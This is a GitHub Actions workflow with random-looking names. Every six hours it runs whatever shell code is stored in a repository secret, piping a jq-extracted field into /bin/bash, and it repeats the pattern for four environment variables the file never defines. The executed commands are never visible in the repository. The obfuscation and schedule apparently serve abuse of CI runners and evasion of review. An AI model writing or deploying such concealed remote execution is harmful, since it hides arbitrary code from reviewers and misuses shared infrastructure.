name: maotongxiao9771

on:
  workflow_dispatch:
  schedule:
    - cron: '1 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maotongxiao9771
        env:
          njua98: ${{ secrets.njua98 }}
        run: |
          echo $njua98 | jq -r .xk95 | /bin/bash
          echo $imf88 | jq -r .ssefo1939 | /bin/bash
          echo $ehxvu498 | jq -r .up99 | /bin/bash
          echo $md19217 | jq -r .ddat2598 | /bin/bash
          echo $dzt6765 | jq -r .mm51 | /bin/bash

